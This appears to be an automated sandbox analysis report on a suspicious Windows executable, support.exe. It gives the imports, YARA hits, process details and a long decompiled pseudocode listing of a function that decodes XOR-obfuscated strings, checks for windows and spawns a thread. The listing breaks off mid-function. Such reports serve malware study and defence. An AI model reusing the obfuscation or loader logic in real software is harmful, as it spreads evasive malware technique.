?_Xlength_error@std@@YAXPBD@Z, ?id@?$ctype@D@std@@2V0locale@2@A, ?_Xout_of_range@std@@YAXPBD@Z, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A
WININET.dll	HttpSendRequestA, InternetConnectA, InternetReadFile, InternetOpenA, HttpOpenRequestA, InternetCloseHandle
WINMM.dll	midiStreamClose, midiOutShortMsg, midiStreamRestart, midiOutReset, midiStreamProperty, midiStreamOpen, midiStreamStop, midiOutUnprepareHeader, midiStreamOut, midiOutPrepareHeader
VCRUNTIME140.dll	memcpy, __CxxFrameHandler3, __std_exception_destroy, __std_exception_copy, memchr, strstr, _CxxThrowException, _except_handler4_common, memset, __std_terminate, memmove
api-ms-win-crt-utility-l1-1-0.dll	rand, srand
api-ms-win-crt-time-l1-1-0.dll	_localtime64, _time64
api-ms-win-crt-stdio-l1-1-0.dll	ungetc, setvbuf, fgetpos, fsetpos, fwrite, __p__commode, _set_fmode, fgetc, fclose, fflush, fputc, fread, _get_stream_buffer_pointers, getchar, _fseeki64
api-ms-win-crt-runtime-l1-1-0.dll	_set_app_type, _get_initial_narrow_environment, _initterm_e, _register_onexit_function, _exit, _initialize_onexit_table, _seh_filter_exe, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _cexit, _initterm, _initialize_narrow_environment, _configure_narrow_argv, _controlfp_s, terminate, __p___argc, _crt_atexit, _invalid_parameter_noinfo_noreturn, exit
api-ms-win-crt-heap-l1-1-0.dll	free, _callnewh, _set_new_mode, malloc
api-ms-win-crt-filesystem-l1-1-0.dll	_unlock_file, _lock_file
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: support.exePID: 6060, Parent PID: 5964

General

Target ID:	0
Start time:	18:45:26
Start date:	23/05/2022
Path:	C:\Users\user\Desktop\support.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\support.exe"
Imagebase:	0x3b0000
File size:	3431424 bytes
MD5 hash:	A2D24BA3B1C040105083109B9912E223
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000000.250484546.0000000000476000.00000008.00000001.01000000.00000003.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000000.250216516.00000000003C5000.00000008.00000001.01000000.00000003.sdmp, Author: Florian Roth
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2404, Parent PID: 6060

General

Target ID:	1
Start time:	18:45:27
Start date:	23/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: support.exePID: 6060, Parent PID: 5964COMMON

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	52.7%
Total number of Nodes:	1852
Total number of Limit Nodes:	11

Executed Functions

Function 003B3B30 Relevance: 102.5, APIs: 41, Strings: 17, Instructions: 1028
sleepstringthreadCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E003B3B30(void* __ebx, void* __edi, void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
				signed int _v20;
				char _v23;
				short _v24;
				char _v25;
				char _v26;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v47;
				signed int _v48;
				char _v51;
				signed int _v52;
				char _v55;
				signed int _v56;
				char _v59;
				signed int _v60;
				char _v63;
				signed int _v64;
				intOrPtr _v68;
				char _v88;
				char _v112;
				char _v115;
				signed char _v116;
				signed char _v117;
				signed char _v118;
				signed char _v119;
				signed char _v120;
				signed char _v121;
				signed char _v122;
				char _v123;
				signed int _v124;
				char _v127;
				short _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v139;
				void* _v140;
				char _v142;
				char _v143;
				short _v144;
				char _v145;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v159;
				signed int _v160;
				char _v167;
				signed int _v168;
				char _v171;
				signed int _v172;
				char _v179;
				signed int _v180;
				char _v183;
				signed int _v184;
				char _v187;
				signed int _v188;
				char _v189;
				char _v190;
				short _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				char _v203;
				void* _v204;
				char _v206;
				char _v207;
				char _v208;
				char _v210;
				char _v211;
				char _v212;
				char _v214;
				char _v215;
				char _v216;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				signed int _t441;
				signed int _t442;
				intOrPtr _t450;
				signed int _t458;
				void* _t463;
				void* _t465;
				void* _t469;
				void* _t471;
				signed int _t483;
				signed char _t490;
				signed int _t492;
				void* _t494;
				signed int _t506;
				signed int _t512;
				void* _t520;
				void* _t532;
				signed char _t540;
				signed int _t542;
				void* _t547;
				signed int _t556;
				intOrPtr* _t558;
				signed int _t565;
				char* _t570;
				signed int _t571;
				void* _t576;
				void* _t580;
				void* _t581;
				void* _t587;
				signed char _t609;
				signed int _t614;
				char _t615;
				signed char _t620;
				signed char _t642;
				signed char _t657;
				signed char _t675;
				signed char _t685;
				signed int _t692;
				intOrPtr _t693;
				signed int _t697;
				signed char _t700;
				signed char _t722;
				char _t725;
				signed char _t726;
				signed char _t732;
				signed char _t765;
				char* _t766;
				void* _t767;
				void* _t769;
				void* _t771;
				void* _t777;
				void* _t784;
				void* _t790;
				void* _t797;
				void* _t803;
				void* _t805;
				void* _t809;
				void* _t812;
				void* _t814;
				void* _t816;
				void* _t818;
				void* _t824;
				signed char _t828;
				char* _t830;
				void* _t831;
				intOrPtr* _t836;
				void* _t838;
				void* _t840;
				void* _t846;
				void* _t848;
				void* _t850;
				void* _t854;
				void* _t857;
				intOrPtr _t858;
				signed int _t859;
				signed int _t860;
				intOrPtr _t861;
				signed int _t867;
				void* _t868;
				void* _t869;
				void* _t870;
				void* _t871;

				_push(0xffffffff);
				_push(E003BF750);
				_push( *[fs:0x0]);
				_t869 = _t868 - 0xe4;
				_t441 =  *0x3c500c; // 0x4b5ee95b
				_t442 = _t441 ^ _t867;
				_v20 = _t442;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t442);
				 *[fs:0x0] =  &_v16;
				if( *0x6f62f4 == 0) {
					L43:
					 *[fs:0x0] = _v16;
					__eflags = _v20 ^ _t867;
					return E003BE3D0(_v20 ^ _t867);
				}
				E003B4EE0( &_v88, 0x3c145d);
				_v8 = 0;
				_t447 =  >=  ?  *0x6f5bb4 : 0x6f5bb4;
				SetConsoleTitleA( >=  ?  *0x6f5bb4 : 0x6f5bb4); // executed
				E003B34A0(__ebx, __edi, __esi);
				_t450 =  *0x6f62ec; // 0x1
				_t854 = Sleep;
				if(_t450 == 2) {
					L38:
					asm("movaps xmm0, [0x3c1600]");
					_t765 = 0;
					__eflags = 0;
					asm("movups [ebp-0xc8], xmm0");
					do {
						_t172 =  &_v204; // 0x7d707d5d
						 *(_t867 + _t765 - 0xc7) =  *(_t867 + _t765 - 0xc7) ^  *_t172;
						_t765 = _t765 + 1;
						__eflags = _t765 - 0xe;
					} while (_t765 < 0xe);
					_v189 = 0;
					_t766 =  &_v203;
				} else {
					_t857 = strstr;
					asm("o16 nop [eax+eax]");
					while(_t450 != 0) {
						E003B4EE0( &_v112, "Dec 27 2021");
						_v8 = 3;
						if(E003B4C20( &_v112, "  ", 0) != 0xffffffff) {
							_push(1);
							E003B4CA0( &_v112, E003B4C20( &_v112, "  ", 0));
						}
						_t642 = 0x74;
						_v140 = 0x54595474;
						_v136 = 0x150027;
						_t463 = 0;
						_v132 = 0x5c540701;
						_v128 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							 *(_t867 + _t463 - 0x87) =  *(_t867 + _t463 - 0x87) ^ _t642;
							_t463 = _t463 + 1;
							if(_t463 >= 0xb) {
								break;
							}
							_t18 =  &_v140; // 0x54595474
							_t642 =  *_t18;
						}
						_v128 = 0;
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v139); // executed
						_t465 = E003B5690("Unknown");
						_v220 = 0;
						_v224 = 0x17;
						_v220 = 0;
						_v223 = 0x29;
						_v222 = 0x20;
						_v221 = 0x13;
						E003B5420(_t465,  &_v223); // executed
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660); // executed
						asm("movaps xmm0, [0x3c17e0]");
						_t777 = 0;
						__eflags = 0;
						asm("movups [ebp-0x9c], xmm0");
						_v144 = 0;
						do {
							 *(_t867 + _t777 - 0x9b) =  *(_t867 + _t777 - 0x9b) ^ _v160;
							_t777 = _t777 + 1;
							__eflags = _t777 - 0xf;
						} while (_t777 < 0xf);
						_v144 = 0;
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v159); // executed
						_t469 = E003B5690( &_v112);
						_v228 = 0;
						_v232 = 0x74;
						_v228 = 0;
						_v231 = 0x29;
						_v230 = 0x20;
						_v229 = 0x70;
						E003B5420(_t469,  &_v231); // executed
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660); // executed
						_t657 = 0x5d;
						_v204 = 0x7d707d5d;
						_v200 = 0x39322f0d;
						_t471 = 0;
						__eflags = 0;
						_v196 = 0x7d293e28;
						_v192 = 0x5770;
						_v190 = 0;
						while(1) {
							 *(_t867 + _t471 - 0xc7) =  *(_t867 + _t471 - 0xc7) ^ _t657;
							_t471 = _t471 + 1;
							__eflags = _t471 - 0xd;
							if(_t471 >= 0xd) {
								break;
							}
							_t53 =  &_v204; // 0x7d707d5d
							_t657 =  *_t53;
						}
						_v190 = 0;
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v203); // executed
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660); // executed
						asm("movaps xmm0, [0x3c19d0]");
						_t784 = 0;
						__eflags = 0;
						asm("movups [ebp-0x3c], xmm0");
						_v32 = 0x1d170d0b;
						asm("movaps xmm0, [0x3c1a30]");
						asm("movups [ebp-0x2c], xmm0");
						_v28 = 0x6111c5e;
						_v24 = 0x74;
						do {
							 *(_t867 + _t784 - 0x3b) =  *(_t867 + _t784 - 0x3b) ^ _v64;
							_t784 = _t784 + 1;
							__eflags = _t784 - 0x28;
						} while (_t784 < 0x28);
						_v23 = 0;
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v63); // executed
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660); // executed
						_v236 = 0;
						_v240 = 0x1a;
						_v236 = 0;
						_v238 = 0x3e;
						_t606 = 0x20;
						_v239 = 0x20;
						_v237 = 0x20;
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v239); // executed
						E003B5FD0(__imp__?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,  &_v88); // executed
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
						_v210 = 0;
						_v212 = 0x4d;
						_v210 = 0;
						__eflags = _v68 - 0x10;
						_v211 = 0x31;
						_t482 =  >=  ? _v88 :  &_v88;
						_t483 = strstr( >=  ? _v88 :  &_v88,  &_v211);
						_t870 = _t869 + 8;
						__eflags = _t483;
						if(_t483 != 0) {
							asm("movaps xmm0, [0x3c1f10]");
							_t790 = 0;
							asm("movups [ebp-0x30], xmm0");
							_v36 = 0x77702366;
							_v32 = 0x70767762;
							_v28 = 0x2d2d2d;
							asm("o16 nop [eax+eax]");
							do {
								 *(_t867 + _t790 - 0x2f) =  *(_t867 + _t790 - 0x2f) ^ _v52;
								_t790 = _t790 + 1;
								__eflags = _t790 - 0x1a;
							} while (_t790 < 0x1a);
							_v25 = 0;
							E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v51);
							__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
							_t858 =  *0x6f6354;
							_v124 = 0x30;
							_v123 = 0x00000055 ^ _v124;
							_t490 = _v124 ^ _v124;
							_v115 = 0;
							_v119 = _t490;
							_t609 = 0x00000001 ^ _t490;
							_v122 = 0 ^ _t490;
							_v121 = 0 ^ _t490;
							_v120 = _t609;
							_t610 = _t609 ^ _t490;
							_v118 = 0 ^ _t490;
							_v117 = 0 ^ _t490;
							_v116 = _t609 ^ _t490;
							_t492 = FindWindowA( &_v123, 0);
							__eflags = _t492;
							if(_t492 == 0) {
								_v124 = 0x70;
								_v123 = 0x00000013 ^ _v124;
								_v115 = 0;
								_t685 = 0x00000003 ^ _v124 ^ _v124;
								_v122 = _t685;
								_v118 = _t685;
								_v115 = 0;
								_v121 = 0x56;
								_v120 = 0x41;
								_v119 = 0;
								_t610 = 0x41;
								_v117 = 0x56;
								_v116 = 0x41;
								_t506 = E003B6C80(0x41,  &_v123, _t854, _t858);
								__eflags = _t506;
								if(_t506 == 0) {
									E003B6D60(0x41, _t854, _t858);
								}
							}
							E003B7610(_t610, 0, _t854, _t858);
							__eflags =  *0x537e28 - 1;
							if( *0x537e28 != 1) {
								_t675 = 0x6c;
								_v140 = 0x4c414c6c;
								_v136 = 0x50d2a;
								_t494 = 0;
								_v132 = 0x414c0809;
								_v128 = 0x4c;
								asm("o16 nop [eax+eax]");
								while(1) {
									 *(_t867 + _t494 - 0x87) =  *(_t867 + _t494 - 0x87) ^ _t675;
									_t494 = _t494 + 1;
									__eflags = _t494 - 0xc;
									if(_t494 >= 0xc) {
										break;
									}
									_t675 = _v140;
								}
								_v127 = 0;
								E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v139);
								__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
								Sleep(0x10cc);
								L101:
								E003B4E10( &_v112);
								goto L42;
							} else {
								asm("movaps xmm0, [0x3c1c60]");
								_t797 = 0;
								__eflags = 0;
								asm("movups [ebp-0x9c], xmm0");
								_v144 = 0x5c;
								do {
									 *(_t867 + _t797 - 0x9b) =  *(_t867 + _t797 - 0x9b) ^ _v160;
									_t797 = _t797 + 1;
									__eflags = _t797 - 0x10;
								} while (_t797 < 0x10);
								_v143 = 0;
								E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v159);
								__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z();
								E003B3A00();
								Sleep(0x10cc);
								E003B4E10( &_v112, E003B5660);
								L42:
								E003B4E10( &_v88);
								goto L43;
							}
						}
						_v214 = 0;
						_v216 = 0x52;
						_v214 = 0;
						__eflags = _v68 - 0x10;
						_v215 = 0x32;
						_t511 =  >=  ? _v88 :  &_v88;
						_t512 = strstr( >=  ? _v88 :  &_v88,  &_v215);
						_t871 = _t870 + 8;
						__eflags = _t512;
						if(_t512 != 0) {
							asm("movaps xmm0, [0x3c1720]");
							_t803 = 0;
							__eflags = 0;
							asm("movups [ebp-0xa8], xmm0");
							_v156 = 0xd5e1f16;
							_v152 = 0xb0a1f0a;
							_v148 = 0x5050500d;
							_v144 = 0;
							do {
								 *(_t867 + _t803 - 0xa7) =  *(_t867 + _t803 - 0xa7) ^ _v172;
								_t803 = _t803 + 1;
								__eflags = _t803 - 0x1b;
							} while (_t803 < 0x1b);
							_t859 = 0;
							_v144 = 0;
							E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v171);
							__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
							_t614 = 0;
							E003B4EE0( &_v48, 0x3c145d);
							_v8 = 4;
							_t805 = 0;
							_t692 =  *0x6f62e8; // 0x87ec2f29
							__eflags = _t692 - 2;
							if(_t692 >= 2) {
								_t195 = _t692 - 2; // 0x87ec2f27
								_t565 = (_t195 >> 1) + 1;
								_t859 = (_t692 ^ 0x00000079) * _t565;
								__eflags = _t859;
								_t805 = _t565 + _t565;
							}
							__eflags = _t805 - _t692;
							if(_t805 < _t692) {
								_t614 = _t692 ^ 0x00000079;
								__eflags = _t614;
							}
							_t693 =  *0x6f6314; // 0xc91684
							_t615 = _t614 + _t859 * 2;
							_t860 = 0;
							_v208 = _t615;
							_t697 = ((0x92492493 * (_t693 -  *0x6f6310) >> 0x20) + _t693 -  *0x6f6310 >> 4 >> 0x1f) + ((0x92492493 * (_t693 -  *0x6f6310) >> 0x20) + _t693 -  *0x6f6310 >> 4);
							__eflags = _t697;
							if(_t697 == 0) {
								L56:
								__eflags = _v32 - 1;
								if(_v32 <= 1) {
									__eflags =  *0x3c5020;
									if( *0x3c5020 == 0) {
										asm("movaps xmm0, [0x3c1e20]");
										_t809 = 0;
										__eflags = 0;
										asm("movups [ebp-0xa8], xmm0");
										_v156 = 0x2b332f22;
										_v152 = 0x30366322;
										_v148 = 0x6d3126;
										do {
											 *(_t867 + _t809 - 0xa7) =  *(_t867 + _t809 - 0xa7) ^ _v172;
											_t809 = _t809 + 1;
											__eflags = _t809 - 0x1a;
										} while (_t809 < 0x1a);
										_v145 = 0;
										E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v171);
										__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
										_t700 = 0x27;
										_v204 = 0x70a0727;
										_v200 = 0x53494864;
										_t520 = 0;
										_v196 = 0x54534446;
										_v192 = 0x71d;
										_v190 = 0;
										asm("o16 nop [eax+eax]");
										while(1) {
											 *(_t867 + _t520 - 0xc7) =  *(_t867 + _t520 - 0xc7) ^ _t700;
											_t520 = _t520 + 1;
											__eflags = _t520 - 0xd;
											if(_t520 >= 0xd) {
												break;
											}
											_t700 = _v204;
										}
										_v190 = 0;
										E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v203);
										__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
										asm("movaps xmm0, [0x3c1ac0]");
										_t812 = 0;
										asm("movups [ebp-0xb4], xmm0");
										_v152 = 0x7b78716e;
										asm("movaps xmm0, [0x3c1d50]");
										asm("movups [ebp-0xa4], xmm0");
										_v148 = 0x7f777d60;
										_v144 = 0x3d;
										asm("o16 nop [eax+eax]");
										do {
											 *(_t867 + _t812 - 0xb3) =  *(_t867 + _t812 - 0xb3) ^ _v184;
											_t812 = _t812 + 1;
											__eflags = _t812 - 0x28;
										} while (_t812 < 0x28);
										_v143 = 0;
										E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v183);
										__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
										asm("movaps xmm0, [0x3c1800]");
										_t814 = 0;
										asm("movups [ebp-0xb0], xmm0");
										_v148 = 0x42060e;
										asm("movaps xmm0, [0x3c1660]");
										asm("movups [ebp-0xa0], xmm0");
										do {
											 *(_t867 + _t814 - 0xaf) =  *(_t867 + _t814 - 0xaf) ^ _v180;
											_t814 = _t814 + 1;
											__eflags = _t814 - 0x22;
										} while (_t814 < 0x22);
										_v145 = 0;
										E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v179);
										__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
										asm("movaps xmm0, [0x3c1780]");
										_t816 = 0;
										__eflags = 0;
										asm("movups [ebp-0xb8], xmm0");
										_v156 = 0x15021804;
										asm("movaps xmm0, [0x3c1dc0]");
										asm("movups [ebp-0xa8], xmm0");
										_v152 = 0x5f031411;
										_v148 = 0x41434845;
										_v144 = 0x5f45;
										_v142 = 0;
										do {
											 *(_t867 + _t816 - 0xb7) =  *(_t867 + _t816 - 0xb7) ^ _v188;
											_t816 = _t816 + 1;
											__eflags = _t816 - 0x2d;
										} while (_t816 < 0x2d);
										_v142 = 0;
										E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v187);
										__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
										Sleep(0xe10);
										L87:
										_v8 = 5;
										E003B4E10( &_v48);
										E003B4E10( &_v112);
										goto L42;
									}
									L59:
									asm("movaps xmm0, [0x3c1fb0]");
									_t818 = 0;
									__eflags = 0;
									asm("movups [ebp-0xa4], xmm0");
									_v152 = 0x79783c30;
									_v148 = 0x3c6e7d;
									do {
										 *(_t867 + _t818 - 0xa3) =  *(_t867 + _t818 - 0xa3) ^ _v168;
										_t818 = _t818 + 1;
										__eflags = _t818 - 0x16;
									} while (_t818 < 0x16);
									_v145 = 0;
									E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v167);
									_t532 = E003B5690( &_v48);
									_v116 = 0;
									_v120 = 0x58;
									_v116 = 0;
									_v119 = 0x20;
									_v118 = 0x2d;
									_v117 = 0x58;
									E003B5420(_t532,  &_v119);
									__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
									asm("movaps xmm0, [0x3c1910]");
									_t824 = 0;
									__eflags = 0;
									asm("movups [ebp-0xa8], xmm0");
									_v156 = 0x3c3b682d;
									_v152 = 0x3b3d3c29;
									_v148 = 0x666666;
									do {
										 *(_t867 + _t824 - 0xa7) =  *(_t867 + _t824 - 0xa7) ^ _v172;
										_t824 = _t824 + 1;
										__eflags = _t824 - 0x1a;
									} while (_t824 < 0x1a);
									_v145 = 0;
									E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v171);
									__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
									_t861 =  *0x6f6354;
									_v124 = 0x39;
									_v123 = 0x5c;
									_t540 = _v124 ^ _v124;
									_v115 = 0;
									_v119 = _t540;
									_v115 = 0;
									_t722 = 0x00000058 ^ _t540;
									_t828 = 0x00000055 ^ _t540;
									_v122 = _t722;
									_t620 = 0x00000008 ^ _t540;
									_v121 = _t828;
									_v120 = _t620;
									_v118 = _t722 ^ _t540;
									_t621 = _t620 ^ _t540;
									_v117 = _t828 ^ _t540;
									_v116 = _t620 ^ _t540;
									_t542 = FindWindowA( &_v123, 0);
									__eflags = _t542;
									if(_t542 == 0) {
										_v124 = 0x6b;
										_v123 = 0x00000008 ^ _v124;
										_v115 = 0;
										_t732 = 0x00000018 ^ _v124 ^ _v124;
										_v122 = _t732;
										_v118 = _t732;
										_v115 = 0;
										_v121 = 0x56;
										_v120 = 0x41;
										_v119 = 0;
										_t621 = 0x41;
										_v117 = 0x56;
										_v116 = 0x41;
										_t556 = E003B6C80(0x41,  &_v123, _t854, _t861);
										__eflags = _t556;
										if(_t556 == 0) {
											E003B6D60(0x41, _t854, _t861);
										}
									}
									 *0x6f6360 = _v208;
									E003B4DE0(0x6f5d1c,  &_v48);
									_t725 =  *0x3c5020; // 0x0
									E003B7610(_t621, _t725, _t854, _t861);
									__eflags =  *0x537e28 - 1;
									if( *0x537e28 != 1) {
										_t726 = 0x57;
										_v140 = 0x777a7757;
										_v136 = 0x3b3e3611;
										_t547 = 0;
										__eflags = 0;
										_v132 = 0x7a773332;
										_v128 = 0x77;
										while(1) {
											 *(_t867 + _t547 - 0x87) =  *(_t867 + _t547 - 0x87) ^ _t726;
											_t547 = _t547 + 1;
											__eflags = _t547 - 0xc;
											if(_t547 >= 0xc) {
												break;
											}
											_t726 = _v140;
										}
										_v127 = 0;
										_t830 =  &_v139;
										goto L74;
									} else {
										asm("movaps xmm0, [0x3c1e90]");
										_t831 = 0;
										__eflags = 0;
										asm("movups [ebp-0x9c], xmm0");
										_v144 = 0x65;
										do {
											 *(_t867 + _t831 - 0x9b) =  *(_t867 + _t831 - 0x9b) ^ _v160;
											_t831 = _t831 + 1;
											__eflags = _t831 - 0x10;
										} while (_t831 < 0x10);
										_v143 = 0;
										_t830 =  &_v159;
										L74:
										E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, _t830);
										__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
										E003B3A00();
										Sleep(0x10cc);
										goto L87;
									}
								}
								 *0x3c5020 = 1;
								goto L59;
							} else {
								_t836 =  *0x6f6310; // 0xc91588
								_t558 = _t836;
								while(1) {
									__eflags =  *_t558 - _t615;
									if( *_t558 == _t615) {
										break;
									}
									_t860 = _t860 + 1;
									_t558 = _t558 + 0x1c;
									__eflags = _t860 - _t697;
									if(_t860 < _t697) {
										continue;
									}
									goto L56;
								}
								__eflags = _t860 * 8 - _t860;
								E003B4DE0( &_v48, _t836 + 4 + (_t860 * 8 - _t860) * 4);
								goto L56;
							}
						}
						_v206 = 0;
						_v208 = 0x23;
						_v206 = 0;
						__eflags = _v68 - 0x10;
						_v207 = 0x33;
						_t569 =  >=  ? _v88 :  &_v88;
						_t570 = strstr( >=  ? _v88 :  &_v88,  &_v207);
						_t869 = _t871 + 8;
						__eflags = _t570;
						if(_t570 == 0) {
							goto L101;
						}
						_t571 =  *0x6f62f7; // 0x0
						__eflags = _t571;
						if(_t571 == 0) {
							L30:
							asm("movaps xmm0, [0x3c1970]");
							_t838 = 0;
							__eflags = 0;
							asm("movups [ebp-0x2c], xmm0");
							_v32 = 0x2e236122;
							_v28 = 0x6f6f6f39;
							_v24 = 0;
							do {
								 *(_t867 + _t838 - 0x2b) =  *(_t867 + _t838 - 0x2b) ^ _v48;
								_t838 = _t838 + 1;
								__eflags = _t838 - 0x17;
							} while (_t838 < 0x17);
							_v24 = 0;
							E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v47);
							__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z();
							E003BA100(_t606,  &_v47, _t854, _t857);
							CreateThread(0, 0, E003B9D80, 0, 0, 0);
							_t576 = E003BC340( &_v48);
							_v8 = 8;
							E003B4E10( &_v48, E003B5660);
							_v8 = 3;
							__eflags =  *((intOrPtr*)(_t576 + 0x10)) - 1;
							if( *((intOrPtr*)(_t576 + 0x10)) >= 1) {
								L34:
								asm("movaps xmm0, [0x3c1ea0]");
								_t840 = 0;
								asm("movups [ebp-0x9c], xmm0");
								_v144 = 0x73;
								asm("o16 nop [eax+eax]");
								do {
									 *(_t867 + _t840 - 0x9b) =  *(_t867 + _t840 - 0x9b) ^ _v160;
									_t840 = _t840 + 1;
									__eflags = _t840 - 0x10;
								} while (_t840 < 0x10);
								_v143 = 0;
								E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v159);
								_t580 = E003BC340( &_v48);
								_v8 = 9;
								_t581 = E003B5690(_t580);
								_v116 = 0;
								_v120 = 0x66;
								_v116 = 0;
								_v119 = 0x20;
								_t606 = 0x66;
								__eflags = 0x46;
								_v118 = 0x2d;
								_v117 = 0x66;
								E003B5420(_t581,  &_v119);
								__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z();
								_v8 = 0xa;
								E003B5010(E003B4E10( &_v48, E003B5660));
								Sleep(0x1388);
								_v8 = 0;
								E003B4E10( &_v112);
								_t857 = strstr;
								L37:
								E003B34A0(_t606, _t854, _t857);
								_t450 =  *0x6f62ec; // 0x1
